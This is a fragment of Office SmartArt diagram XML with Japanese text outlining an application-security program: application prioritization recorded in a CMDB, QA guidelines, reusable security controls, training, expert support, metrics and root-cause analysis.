              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を測定し、優先順位付けを行います。結果を</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>に追加します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{145ACD7C-C0C8-1743-AFA1-313751377A3E}" type="parTrans" cxnId="{0F9B4559-F128-5B45-A437-94819A865579}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40B45E4A-293B-7849-8B72-2E60FA4BAB44}" type="sibTrans" cxnId="{0F9B4559-F128-5B45-A437-94819A865579}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8838A283-3E95-7240-84DF-5EACA6B35DC9}">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範囲と厳密さのレベルを適切に設定するために、品質保証ガイドラインを確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BE02A35-757B-774B-8B87-8DBC4143B131}" type="parTrans" cxnId="{4C63CC12-CE6F-D148-80E7-D501F57870A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{627DD058-B61C-DF49-B224-2EB936753F15}" type="sibTrans" cxnId="{4C63CC12-CE6F-D148-80E7-D501F57870A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0957FC86-78B3-B341-9184-29DB5145BE7C}">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これらの方針と標準を補完する</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>再利用可能なセキュリティ制御</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を定義し、それらを使用する際の設計開発ガイドラインを提供します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E13283A-8913-C841-BF85-C794761E8CA4}" type="parTrans" cxnId="{392A3401-B6FE-F74E-8FB2-0B62051900E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B218B508-C6BD-3748-BF26-ECCFEDF85462}" type="sibTrans" cxnId="{392A3401-B6FE-F74E-8FB2-0B62051900E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B45A33F-729F-4B42-B2AA-0CE0777007B0}">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様々な開発の役割やトピックからなる</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>アプリケーションセキュリティのトレーニングカリキュラム</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を確立します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07A48406-34DD-0844-8F08-6B3184B7C07E}" type="parTrans" cxnId="{315013FA-2423-4C43-853A-B455FE00D040}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEC217A4-CE54-4F44-A0FD-6E79F9700B79}" type="sibTrans" cxnId="{315013FA-2423-4C43-853A-B455FE00D040}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>セキュリティを既存プロセスに統合</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}">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定数的管理を実施します。改良と、収集した数値と分析データに基づく改善及び資金調達を実施します。数値には、セキュリティプラクティスとアクティビティの遵守、検出された脆弱性、緩和された脆弱性、アプリケーションの範囲、タイプとインスタンスによる欠陥密度等を含みます。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0574093-32C8-C540-80A0-D5614D70DE73}">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開発及びプロジェクトチームが成功するように専門家（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>SME</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>）と</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>サポートサービス</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>を提供します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EBB42F84-1FCA-514D-B4BC-AA55945827F1}" type="parTrans" cxnId="{00FE48E6-685E-9F42-A009-FA1E3777BFA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C034172C-22E7-AE45-BA88-F0043426ED08}" type="sibTrans" cxnId="{00FE48E6-685E-9F42-A009-FA1E3777BFA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D14A2848-A31E-2948-B157-68328D5A44D1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>企業全体での戦略的、システマティックな改善を目的とした根本的な原因と脆弱性のパターンを発見するために実装と確認の作業から得たデータを分析します。失敗から学び、改善を進める積極的なインセンティブを提供します。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{219BD30C-AFCB-A24E-A9C2-30FB3AF54D3B}" type="parTrans" cxnId="{471AB66B-5F0F-9249-B3C2-9FC10332296D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{538BEEDC-F02C-5545-AEAB-9E97FFABF78B}" type="sibTrans" cxnId="{471AB66B-5F0F-9249-B3C2-9FC10332296D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>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56609">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5" custScaleY="64948">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56609">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5" custScaleY="66081">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56609" custLinFactNeighborX="3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5" custScaleY="62723">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56521">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="53130">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>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56521">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="63359">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{392A3401-B6FE-F74E-8FB2-0B62051900E4}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{0957FC86-78B3-B341-9184-29DB5145BE7C}" srcOrd="1" destOrd="0" parTransId="{6E13283A-8913-C841-BF85-C794761E8CA4}" sibTransId="{B218B508-C6BD-3748-BF26-ECCFEDF85462}"/>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2F80760B-CAFC-4846-A58F-E09AC74FC5DD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4C63CC12-CE6F-D148-80E7-D501F57870A6}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{8838A283-3E95-7240-84DF-5EACA6B35DC9}" srcOrd="3" destOrd="0" parTransId="{4BE02A35-757B-774B-8B87-8DBC4143B131}" sibTransId="{627DD058-B61C-DF49-B224-2EB936753F15}"/>
    <dgm:cxn modelId="{EA88B819-0C50-2040-9AE6-390D3F7E426F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4AAFEA1C-0D0F-B34B-A23B-00BCE0C7AB80}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{777B131F-97C2-AE41-AF00-BF5AAB559094}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{8EB2A2F8-F868-134D-ACBD-0D9EF5674B8F}" srcOrd="2" destOrd="0" parTransId="{5B98650A-00DD-C647-8FBA-D23DD88FEE79}" sibTransId="{20E7416D-3FA2-6A48-8195-4B1680AC15DF}"/>
    <dgm:cxn modelId="{1F971231-8537-9B40-8B5E-06B8AB79F330}" type="presOf" srcId="{8838A283-3E95-7240-84DF-5EACA6B35DC9}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{846B9F3D-0100-664F-9893-070718EA3806}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C97A0F4D-9854-C44F-9091-9ED0B9462751}" type="presOf" srcId="{0957FC86-78B3-B341-9184-29DB5145BE7C}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A12A534F-F385-574D-AA90-AE68B9D59070}" type="presOf" srcId="{8EB2A2F8-F868-134D-ACBD-0D9EF5674B8F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0F9B4559-F128-5B45-A437-94819A865579}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{ACF002B6-2631-0F42-BEDA-2C0CA3A25A35}" srcOrd="2" destOrd="0" parTransId="{145ACD7C-C0C8-1743-AFA1-313751377A3E}" sibTransId="{40B45E4A-293B-7849-8B72-2E60FA4BAB44}"/>
    <dgm:cxn modelId="{8C5DEC61-400D-FE4D-8336-3934733ADC4C}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{D8A356C8-6FA5-3441-9AEF-17B51A9CE6F5}" srcOrd="3" destOrd="0" parTransId="{FF8848A4-C791-054D-9D97-673D39F3C51E}" sibTransId="{10AE746F-1F0D-8F44-8880-C62BFDC92824}"/>
    <dgm:cxn modelId="{E886EF64-C0B5-DA4C-B26F-E98D9C8D6208}" type="presOf" srcId="{D14A2848-A31E-2948-B157-68328D5A44D1}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E477C266-8354-2E4E-B998-1968C3E9AAC3}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{471AB66B-5F0F-9249-B3C2-9FC10332296D}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D14A2848-A31E-2948-B157-68328D5A44D1}" srcOrd="1" destOrd="0" parTransId="{219BD30C-AFCB-A24E-A9C2-30FB3AF54D3B}" sibTransId="{538BEEDC-F02C-5545-AEAB-9E97FFABF78B}"/>
    <dgm:cxn modelId="{F8C64B7F-B60A-9741-85BE-D7EA2B668159}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8E854885-06DF-5840-9D7D-5C7684458379}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{A8FE1E1A-0E9D-F34E-B52C-238DC9B81A61}" srcOrd="1" destOrd="0" parTransId="{43625458-1C1C-1D42-BCDA-7BD1C2DECF1E}" sibTransId="{9F8C68AC-C1C6-3740-A12D-B2CC546660A8}"/>
    <dgm:cxn modelId="{BBB13087-447B-294F-AFB1-D3712B8353B8}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D33E389-58B7-1142-A6BD-8178E5656980}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5BDD7497-C1CD-E746-B5E7-B466C77A3948}" type="presOf" srcId="{6B45A33F-729F-4B42-B2AA-0CE0777007B0}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3BE27798-5680-5B45-B9CC-C26B1B424891}" type="presOf" srcId="{B0574093-32C8-C540-80A0-D5614D70DE73}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1"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552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{61ABDBB3-41E0-EF48-AC6E-A05A869B1F31}" type="presOf" srcId="{D8A356C8-6FA5-3441-9AEF-17B51A9CE6F5}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DCC998B4-2686-C148-8842-FFAAABA5B2B1}" type="presOf" srcId="{ACF002B6-2631-0F42-BEDA-2C0CA3A25A35}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FECA56B9-BC87-724F-A7F9-B49F041C0692}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{A953D82E-BB3B-DC41-A0B6-05A946A57241}" srcOrd="1" destOrd="0" parTransId="{85827E3B-D025-5048-ABC5-F5A42A2227FA}" sibTransId="{56AD9917-3EF1-9B48-AE98-DCDFF72E10D6}"/>
